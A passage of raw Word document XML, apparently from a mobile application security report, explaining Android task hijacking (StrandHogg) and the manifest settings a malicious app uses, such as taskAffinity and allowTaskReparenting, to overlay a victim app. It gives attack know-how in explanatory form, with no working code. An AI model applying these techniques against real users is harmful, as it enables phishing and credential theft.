        <w:rPr/>
        <w:t>A malicious app could leverage this weakness to manipulate the way in which users interact with the app. More</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>specifically,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>instigated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>relocating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>malicious attacker-controlled activity in the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>flow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>may</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>useful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>perform Phishing, Denial-of-Service or capturing user-credentials. This issue has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>been</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploited by banking malware trojans in the past</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="377"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>StrandHogg </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and regular Task Hijacking, malicious applications typically use one or more of the following techniques:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1140" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="240" w:after="0"/>
        <w:ind w:left="1140" w:right="364" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Task Affinity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Manipulation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>malicious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>two</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>activities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>M1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>M2 wherein </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>M2.taskAffinity = com.victim.app </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>M2.allowTaskReparenting = true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the malicious app is opened on M2, once the victim application has initiated, M2 is relocated to the front and the user will interact with the malicious application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1140" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="200" w:after="0"/>
        <w:ind w:left="1140" w:right="364" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Single Task Mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: If the victim application has set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>launchMode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>singleTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, malicious applications can use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>M2.taskAffinity = com.victim.app </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to hijack the victim application task stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487598080">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>93331</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="35" name="Graphic 35"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="35" name="Graphic 35"/>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7.34895pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15718400;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape26" coordorigin="1440,147" coordsize="2880,0" path="m1440,147l4320,147e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId62">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.htm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>l</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="41"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId63">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.android.com/guide/topics/manifest/activity-element#lmode</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="20"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId64">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.helpnetsecurity.com/2019/12/03/strandhogg-vulnerability/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="35"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId65">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://s2.ist.psu.edu/paper/usenix15-final-ren.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId66">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.helpnetsecurity.com/2020/05/28/cve-2020-0096/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="68"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId67">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.xda-developers.com/strandhogg-2-0-android-vulnerability-explained-developer-mitigation/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="44"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId68">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://source.android.com/security/bulletin/2020-05-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-7"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>01</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="79"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId69">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://arstechnica.com/.../...fully-patched-android-phones-under-active-attack-by-bank-thieves/</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ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1140" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1140" w:right="370" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Task Reparenting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: If the victim application has set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>taskReparenting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>true, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>malicious applications can move the victim application task to the malicious application stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>However,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>StrandHogg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2.0,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>exported</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>activities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>launchMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>singleTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>singleInstance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
